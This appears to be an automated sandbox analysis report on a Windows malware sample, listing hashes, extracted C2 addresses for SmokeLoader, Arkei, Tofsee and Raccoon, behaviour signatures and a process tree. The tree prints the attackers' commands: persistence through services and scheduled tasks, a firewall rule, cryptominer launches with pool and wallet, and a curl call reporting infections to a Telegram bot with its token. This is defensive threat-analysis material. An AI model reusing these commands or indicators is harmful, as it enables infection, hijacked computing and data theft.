Analysis

  • max time kernel
    4265016s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    17/01/2022, 11:11

General

  • Target

    d08f0d2e9cdd8238fabd8a99cc802c83.exe

  • Size

    333KB

  • MD5

    d08f0d2e9cdd8238fabd8a99cc802c83

  • SHA1

    e770ae3bc340e120c5e0bfab76d792c28e873c24

  • SHA256

    fb78e43ae17426eb0f2066a30e1eff92116eff495f10f1789f1f69fab3c377c0

  • SHA512

    3c8fcbfc8f6fede411bffa07069a1a09c2e8289a63e0ec0b3cc8e9defc803bc0415f197ee7cd671d183977eeed921cf991c6767c14f16d063f69b4739774c1bb

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

arkei

Botnet

Default

C2

http://file-file-host4.com/tratata.php

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

raccoon

Version

1.8.4-hotfixs

rc4.plain

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 7 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d08f0d2e9cdd8238fabd8a99cc802c83.exe
    "C:\Users\Admin\AppData\Local\Temp\d08f0d2e9cdd8238fabd8a99cc802c83.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3624
    • C:\Users\Admin\AppData\Local\Temp\d08f0d2e9cdd8238fabd8a99cc802c83.exe
      "C:\Users\Admin\AppData\Local\Temp\d08f0d2e9cdd8238fabd8a99cc802c83.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:448
  • C:\Windows\system32\MusNotification.exe
    C:\Windows\system32\MusNotification.exe
    1⤵
    • Checks processor information in registry
    • Suspicious use of AdjustPrivilegeToken
    PID:1884
  • C:\Users\Admin\AppData\Local\Temp\E153.exe
    C:\Users\Admin\AppData\Local\Temp\E153.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:816
  • C:\Users\Admin\AppData\Local\Temp\E7AD.exe
    C:\Users\Admin\AppData\Local\Temp\E7AD.exe
    1⤵
    • Executes dropped EXE
    PID:1376
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 552
      2⤵
      • Program crash
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      PID:3708
  • C:\Users\Admin\AppData\Local\Temp\EB29.exe
    C:\Users\Admin\AppData\Local\Temp\EB29.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mkxaeepj\
      2⤵
        PID:2776
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\tioidtrg.exe" C:\Windows\SysWOW64\mkxaeepj\
        2⤵
          PID:3992
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create mkxaeepj binPath= "C:\Windows\SysWOW64\mkxaeepj\tioidtrg.exe /d\"C:\Users\Admin\AppData\Local\Temp\EB29.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2400
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description mkxaeepj "wifi internet conection"
            2⤵
              PID:1468
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start mkxaeepj
              2⤵
                PID:3336
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3860
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 592
                  2⤵
                  • Program crash
                  PID:2116
              • C:\Users\Admin\AppData\Local\Temp\EC91.exe
                C:\Users\Admin\AppData\Local\Temp\EC91.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2812
                • C:\Users\Admin\AppData\Local\Temp\EC91.exe
                  C:\Users\Admin\AppData\Local\Temp\EC91.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2444
              • C:\Windows\SysWOW64\mkxaeepj\tioidtrg.exe
                C:\Windows\SysWOW64\mkxaeepj\tioidtrg.exe /d"C:\Users\Admin\AppData\Local\Temp\EB29.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2932
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3640
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1020
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 532
                  2⤵
                  • Program crash
                  PID:4044
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1288 -ip 1288
                1⤵
                  PID:3156
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2932 -ip 2932
                  1⤵
                    PID:3276
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1376 -ip 1376
                    1⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Suspicious use of WriteProcessMemory
                    PID:3972
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
                    1⤵
                      PID:1544
                    • C:\Users\Admin\AppData\Local\Temp\5000.exe
                      C:\Users\Admin\AppData\Local\Temp\5000.exe
                      1⤵
                      • Executes dropped EXE
                      PID:1756
                    • C:\Users\Admin\AppData\Local\Temp\5511.exe
                      C:\Users\Admin\AppData\Local\Temp\5511.exe
                      1⤵
                      • Executes dropped EXE
                      PID:3920
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 608
                        2⤵
                        • Program crash
                        PID:876
                    • C:\Users\Admin\AppData\Local\Temp\5EA8.exe
                      C:\Users\Admin\AppData\Local\Temp\5EA8.exe
                      1⤵
                      • Executes dropped EXE
                      PID:3264
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 444
                        2⤵
                        • Program crash
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        PID:1432
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 452
                        2⤵
                        • Program crash
                        PID:2736
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3264 -ip 3264
                      1⤵
                      • Suspicious use of NtCreateProcessExOtherParentProcess
                      PID:1452
                    • C:\Users\Admin\AppData\Local\Temp\638B.exe
                      C:\Users\Admin\AppData\Local\Temp\638B.exe
                      1⤵
                      • Executes dropped EXE
                      PID:816
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        #cmd
                        2⤵
                          PID:2572
                          • C:\Users\Admin\AppData\Roaming\safas2f.exe
                            "C:\Users\Admin\AppData\Roaming\safas2f.exe"
                            3⤵
                              PID:3224
                              • C:\Windows\SYSTEM32\curl.exe
                                curl "https://api.telegram.org/bot5064846500:AAHry1gCN-2xxTc0w6PEpBIOJMW-LhSNOkw/sendMessage?chat_id=-1001485632573&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0A(Windows Defender has been turned off)"
                                4⤵
                                  PID:876
                                • C:\Windows\explorer.exe
                                  "C:\Windows\explorer.exe"
                                  4⤵
                                    PID:1516
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                      5⤵
                                        PID:1736
                                    • C:\Windows\bfsvc.exe
                                      C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobrishe -mi 14
                                      4⤵
                                        PID:2940
                                    • C:\Users\Admin\AppData\Roaming\whw.exe
                                      "C:\Users\Admin\AppData\Roaming\whw.exe"
                                      3⤵
                                        PID:812
                                      • C:\Users\Admin\AppData\Roaming\e3dwefw.exe
                                        "C:\Users\Admin\AppData\Roaming\e3dwefw.exe"
                                        3⤵
                                          PID:3632
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                            4⤵
                                            • Creates scheduled task(s)
                                            PID:2296
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3264 -ip 3264
                                      1⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      PID:1740
                                    • C:\Windows\SysWOW64\explorer.exe
                                      C:\Windows\SysWOW64\explorer.exe
                                      1⤵
                                        PID:3248
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 872
                                          2⤵
                                          • Program crash
                                          PID:3356
                                      • C:\Windows\explorer.exe
                                        C:\Windows\explorer.exe
                                        1⤵
                                          PID:3432
                                        • C:\Users\Admin\AppData\Local\Temp\77A0.exe
                                          C:\Users\Admin\AppData\Local\Temp\77A0.exe
                                          1⤵
                                            PID:3172
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
                                              2⤵
                                                PID:2956
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
                                                  3⤵
                                                  • Creates scheduled task(s)
                                                  PID:3376
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
                                                2⤵
                                                  PID:776
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
                                                    3⤵
                                                      PID:1560
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
                                                        4⤵
                                                          PID:1552
                                                        • C:\Windows\explorer.exe
                                                          C:\Windows\explorer.exe vlrbkeihyt0 mkl5loplVfqa2wWtDpjzJ5fnYag1V907TInsHor322EwNq4bblptfvYwSt5YE6pKDyB4y+z3bomLLJZlqbcFmSOXHD2a6a11I2EX5y9vTvgSoJAX6cTqkputq4T2QIzbcXjGrXHprbxsT466f4WJruxgGqlP0m3mT31OJKUY9nZRner39PVKvA85uoRQjIl6Q/SYcRqRj7g1WLqGF6K7AP5qxXcSMGXD+byVV8vECWK4NxN1aJ/AqvKRgjPt/A4xELzpppU2mpBP/g+PPcW+FyQcfdJNSW9I04nJSdUh8/gVx5XLDpYQ480AqjLywPADmKjXIKjVY56+oN/AIluaEx4wjt73YlVUT9efi7j2ZMSe+ER0YKcPJAxJTSgq9iW3B/2z7gedaY56c2kWTnb62MTaxz7GzyMVAMtHnbspF1TtgqhXzqEC/TBCKjvGRTyHTQT7IB756+e6O+m4Y+G3lpPP/5YMPrZ7P+0lxUsfCaw=
                                                          4⤵
                                                            PID:3892
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3248 -ip 3248
                                                      1⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      PID:3912
                                                    • C:\Users\Admin\AppData\Local\Temp\7D1F.exe
                                                      C:\Users\Admin\AppData\Local\Temp\7D1F.exe
                                                      1⤵
                                                        PID:3924
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3920 -ip 3920
                                                        1⤵
                                                          PID:4072
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                          1⤵
                                                            PID:676
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                              2⤵
                                                              • Creates scheduled task(s)
                                                              PID:3760

                                                          Network

                                                                MITRE ATT&CK Enterprise v6

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • memory/448-132-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                  Filesize

                                                                  36KB

                                                                • memory/816-235-0x00000000052F0000-0x0000000005382000-memory.dmp

                                                                  Filesize

                                                                  584KB

                                                                • memory/816-142-0x0000000000570000-0x0000000000579000-memory.dmp

                                                                  Filesize

                                                                  36KB

                                                                • memory/816-143-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                  Filesize

                                                                  328KB

                                                                • memory/816-245-0x00000000058C0000-0x00000000058CA000-memory.dmp

                                                                  Filesize

                                                                  40KB

                                                                • memory/816-141-0x0000000000560000-0x0000000000569000-memory.dmp

                                                                  Filesize

                                                                  36KB

                                                                • memory/816-234-0x0000000005950000-0x0000000005EF4000-memory.dmp

                                                                  Filesize

                                                                  5.6MB

                                                                • memory/816-236-0x0000000005720000-0x0000000005796000-memory.dmp

                                                                  Filesize

                                                                  472KB

                                                                • memory/816-233-0x00000000008E0000-0x0000000000A0A000-memory.dmp

                                                                  Filesize

                                                                  1.2MB

                                                                • memory/816-232-0x00000000008E0000-0x0000000000A0A000-memory.dmp

                                                                  Filesize

                                                                  1.2MB

                                                                • memory/816-239-0x00000000052D0000-0x00000000052EE000-memory.dmp

                                                                  Filesize

                                                                  120KB

                                                                • memory/816-238-0x0000000005390000-0x0000000005391000-memory.dmp

                                                                  Filesize

                                                                  4KB

                                                                • memory/1020-213-0x0000000002B80000-0x0000000002C71000-memory.dmp

                                                                  Filesize

                                                                  964KB

                                                                • memory/1020-209-0x0000000002B80000-0x0000000002C71000-memory.dmp

                                                                  Filesize

                                                                  964KB

                                                                • memory/1288-154-0x0000000000720000-0x0000000000733000-memory.dmp

                                                                  Filesize

                                                                  76KB

                                                                • memory/1288-151-0x0000000000879000-0x000000000088A000-memory.dmp

                                                                  Filesize

                                                                  68KB

                                                                • memory/1288-157-0x0000000000400000-0x00000000005DB000-memory.dmp

                                                                  Filesize

                                                                  1.9MB

                                                                • memory/1376-153-0x0000000000400000-0x00000000005DC000-memory.dmp

                                                                  Filesize

                                                                  1.9MB

                                                                • memory/1376-152-0x00000000020D0000-0x00000000020EC000-memory.dmp

                                                                  Filesize

                                                                  112KB

                                                                • memory/1376-144-0x0000000000749000-0x000000000075A000-memory.dmp

                                                                  Filesize

                                                                  68KB

                                                                • memory/1756-221-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                                  Filesize

                                                                  39.8MB

                                                                • memory/1756-261-0x0000000004A70000-0x0000000004ABF000-memory.dmp

                                                                  Filesize

                                                                  316KB

                                                                • memory/1756-257-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                                  Filesize

                                                                  39.8MB

                                                                • memory/1756-263-0x0000000004AC0000-0x0000000004B51000-memory.dmp

                                                                  Filesize

                                                                  580KB

                                                                • memory/1756-270-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                                  Filesize

                                                                  39.8MB

                                                                • memory/1756-217-0x00000000048A0000-0x0000000004945000-memory.dmp

                                                                  Filesize

                                                                  660KB

                                                                • memory/1756-228-0x00000000049C0000-0x0000000004A52000-memory.dmp

                                                                  Filesize

                                                                  584KB

                                                                • memory/1756-227-0x0000000004950000-0x00000000049B8000-memory.dmp

                                                                  Filesize

                                                                  416KB

                                                                • memory/1756-237-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                                  Filesize

                                                                  39.8MB

                                                                • memory/1756-225-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                                  Filesize

                                                                  39.8MB

                                                                • memory/2424-167-0x0000000007570000-0x0000000007586000-memory.dmp

                                                                  Filesize

                                                                  88KB

                                                                • memory/2424-134-0x0000000000AF0000-0x0000000000B06000-memory.dmp

                                                                  Filesize

                                                                  88KB

                                                                • memory/2444-186-0x00000000054E0000-0x00000000055EA000-memory.dmp

                                                                  Filesize

                                                                  1.0MB

                                                                • memory/2444-194-0x0000000006FF0000-0x00000000071B2000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                • memory/2444-179-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                  Filesize

                                                                  128KB

                                                                • memory/2444-190-0x00000000062B0000-0x0000000006326000-memory.dmp

                                                                  Filesize

                                                                  472KB

                                                                • memory/2444-189-0x0000000005770000-0x00000000057D6000-memory.dmp

                                                                  Filesize

                                                                  408KB

                                                                • memory/2444-188-0x0000000005410000-0x000000000544C000-memory.dmp

                                                                  Filesize

                                                                  240KB

                                                                • memory/2444-187-0x0000000005370000-0x0000000005988000-memory.dmp

                                                                  Filesize

                                                                  6.1MB

                                                                • memory/2444-195-0x00000000076F0000-0x0000000007C1C000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

                                                                • memory/2444-191-0x00000000063F0000-0x0000000006482000-memory.dmp

                                                                  Filesize

                                                                  584KB

                                                                • memory/2444-185-0x00000000053B0000-0x00000000053C2000-memory.dmp

                                                                  Filesize

                                                                  72KB

                                                                • memory/2444-192-0x0000000006A40000-0x0000000006FE4000-memory.dmp

                                                                  Filesize

                                                                  5.6MB

                                                                • memory/2444-184-0x0000000005990000-0x0000000005FA8000-memory.dmp

                                                                  Filesize

                                                                  6.1MB

                                                                • memory/2444-183-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                  Filesize

                                                                  128KB

                                                                • memory/2444-193-0x00000000064B0000-0x00000000064CE000-memory.dmp

                                                                  Filesize

                                                                  120KB

                                                                • memory/2444-182-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                  Filesize

                                                                  128KB

                                                                • memory/2572-275-0x0000000000790000-0x00000000007FC000-memory.dmp

                                                                  Filesize

                                                                  432KB

                                                                • memory/2572-276-0x0000000000790000-0x00000000007FC000-memory.dmp

                                                                  Filesize

                                                                  432KB

                                                                • memory/2812-169-0x00000000057A0000-0x0000000005D44000-memory.dmp

                                                                  Filesize

                                                                  5.6MB

                                                                • memory/2812-158-0x00000000051E0000-0x00000000051E1000-memory.dmp

                                                                  Filesize

                                                                  4KB

                                                                • memory/2812-164-0x0000000005020000-0x000000000503E000-memory.dmp

                                                                  Filesize

                                                                  120KB

                                                                • memory/2812-159-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

                                                                  Filesize

                                                                  4KB

                                                                • memory/2812-156-0x0000000000660000-0x00000000006EA000-memory.dmp

                                                                  Filesize

                                                                  552KB

                                                                • memory/2812-155-0x0000000000660000-0x00000000006EA000-memory.dmp

                                                                  Filesize

                                                                  552KB

                                                                • memory/2812-161-0x0000000005040000-0x00000000050B6000-memory.dmp

                                                                  Filesize

                                                                  472KB

                                                                • memory/2932-177-0x0000000000400000-0x00000000005DB000-memory.dmp

                                                                  Filesize

                                                                  1.9MB

                                                                • memory/2932-172-0x0000000000823000-0x0000000000833000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-326-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-345-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-347-0x00007FFB79540000-0x00007FFB79550000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-346-0x00007FFB79540000-0x00007FFB79550000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-343-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-344-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-332-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-342-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-341-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-340-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-339-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-337-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-336-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-334-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-333-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-331-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-330-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-329-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-328-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-327-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-325-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-324-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-323-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-322-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-321-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-320-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-319-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3224-318-0x00007FFB794A0000-0x00007FFB794B0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3248-243-0x0000000002D20000-0x0000000002D94000-memory.dmp

                                                                  Filesize

                                                                  464KB

                                                                • memory/3248-246-0x0000000002CB0000-0x0000000002D1B000-memory.dmp

                                                                  Filesize

                                                                  428KB

                                                                • memory/3264-226-0x0000000002570000-0x00000000025D0000-memory.dmp

                                                                  Filesize

                                                                  384KB

                                                                • memory/3432-244-0x0000000000BB0000-0x0000000000BB7000-memory.dmp

                                                                  Filesize

                                                                  28KB

                                                                • memory/3432-247-0x0000000000BA0000-0x0000000000BAC000-memory.dmp

                                                                  Filesize

                                                                  48KB

                                                                • memory/3624-130-0x0000000000658000-0x0000000000669000-memory.dmp

                                                                  Filesize

                                                                  68KB

                                                                • memory/3624-133-0x0000000000790000-0x0000000000799000-memory.dmp

                                                                  Filesize

                                                                  36KB

                                                                • memory/3640-175-0x0000000000A10000-0x0000000000A11000-memory.dmp

                                                                  Filesize

                                                                  4KB

                                                                • memory/3640-206-0x00000000041F0000-0x00000000041F7000-memory.dmp

                                                                  Filesize

                                                                  28KB

                                                                • memory/3640-174-0x0000000000AF0000-0x0000000000B05000-memory.dmp

                                                                  Filesize

                                                                  84KB

                                                                • memory/3640-204-0x0000000009F00000-0x000000000A30B000-memory.dmp

                                                                  Filesize

                                                                  4.0MB

                                                                • memory/3640-176-0x0000000000A10000-0x0000000000A11000-memory.dmp

                                                                  Filesize

                                                                  4KB

                                                                • memory/3640-202-0x00000000041E0000-0x00000000041E5000-memory.dmp

                                                                  Filesize

                                                                  20KB

                                                                • memory/3640-196-0x0000000005000000-0x000000000520F000-memory.dmp

                                                                  Filesize

                                                                  2.1MB

                                                                • memory/3640-198-0x0000000004180000-0x0000000004186000-memory.dmp

                                                                  Filesize

                                                                  24KB

                                                                • memory/3640-200-0x0000000004190000-0x00000000041A0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/3920-271-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                                  Filesize

                                                                  39.8MB

                                                                • memory/3920-272-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                                  Filesize

                                                                  39.8MB

                                                                • memory/3920-241-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                                  Filesize

                                                                  39.8MB

                                                                • memory/3924-258-0x0000000000110000-0x000000000024A000-memory.dmp

                                                                  Filesize

                                                                  1.2MB

                                                                • memory/3924-260-0x0000000074F00000-0x0000000074F89000-memory.dmp

                                                                  Filesize

                                                                  548KB

                                                                • memory/3924-262-0x00000000056D0000-0x0000000005CE8000-memory.dmp

                                                                  Filesize

                                                                  6.1MB

                                                                • memory/3924-264-0x0000000005120000-0x0000000005132000-memory.dmp

                                                                  Filesize

                                                                  72KB

                                                                • memory/3924-265-0x0000000005250000-0x000000000535A000-memory.dmp

                                                                  Filesize

                                                                  1.0MB

                                                                • memory/3924-259-0x0000000000110000-0x000000000024A000-memory.dmp

                                                                  Filesize

                                                                  1.2MB

                                                                • memory/3924-254-0x0000000002530000-0x0000000002574000-memory.dmp

                                                                  Filesize

                                                                  272KB

                                                                • memory/3924-266-0x00000000051B0000-0x00000000051EC000-memory.dmp

                                                                  Filesize

                                                                  240KB

                                                                • memory/3924-269-0x0000000075770000-0x00000000757BC000-memory.dmp

                                                                  Filesize

                                                                  304KB

                                                                • memory/3924-268-0x00000000050B0000-0x00000000056C8000-memory.dmp

                                                                  Filesize

                                                                  6.1MB

                                                                • memory/3924-267-0x00000000758C0000-0x0000000075E73000-memory.dmp

                                                                  Filesize

                                                                  5.7MB

